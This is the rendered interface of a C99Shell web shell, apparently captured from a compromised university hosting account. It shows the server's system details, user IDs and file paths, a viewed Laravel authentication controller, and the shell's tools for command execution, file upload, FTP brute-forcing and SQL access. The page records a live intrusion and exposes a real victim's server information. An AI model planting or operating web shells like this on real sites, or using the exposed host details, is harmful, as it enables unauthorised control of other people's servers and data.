!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/app/Http/Controllers/Auth/   drwxr-xr-x
Free 117.31 GB of 200.55 GB (58.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AuthController.php (1.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Http\Controllers\Auth;

use 
App\User;
use 
Validator;
use 
App\Http\Controllers\Controller;
use 
Illuminate\Foundation\Auth\ThrottlesLogins;
use 
Illuminate\Foundation\Auth\AuthenticatesAndRegistersUsers;

class 
AuthController extends Controller
{
    
/*
    |--------------------------------------------------------------------------
    | Registration & Login Controller
    |--------------------------------------------------------------------------
    |
    | This controller handles the registration of new users, as well as the
    | authentication of existing users. By default, this controller uses
    | a simple trait to add these behaviors. Why don't you explore it?
    |
    */

    
use AuthenticatesAndRegistersUsersThrottlesLogins;

    
/**
     * Where to redirect users after login / registration.
     *
     * @var string
     */
    
protected $redirectTo '/';

    
/**
     * Create a new authentication controller instance.
     *
     * @return void
     */
    
public function __construct()
    {
        
$this->middleware($this->guestMiddleware(), ['except' => 'logout']);
    }

    
/**
     * Get a validator for an incoming registration request.
     *
     * @param  array  $data
     * @return \Illuminate\Contracts\Validation\Validator
     */
    
protected function validator(array $data)
    {
        return 
Validator::make($data, [
            
'name' => 'required|max:255',
            
'email' => 'required|email|max:255|unique:users',
            
'password' => 'required|min:6|confirmed',
        ]);
    }

    
/**
     * Create a new user instance after a valid registration.
     *
     * @param  array  $data
     * @return User
     */
    
protected function create(array $data)
    {
        return 
User::create([
            
'name' => $data['name'],
            
'email' => $data['email'],
            
'password' => bcrypt($data['password']),
        ]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0162 ]--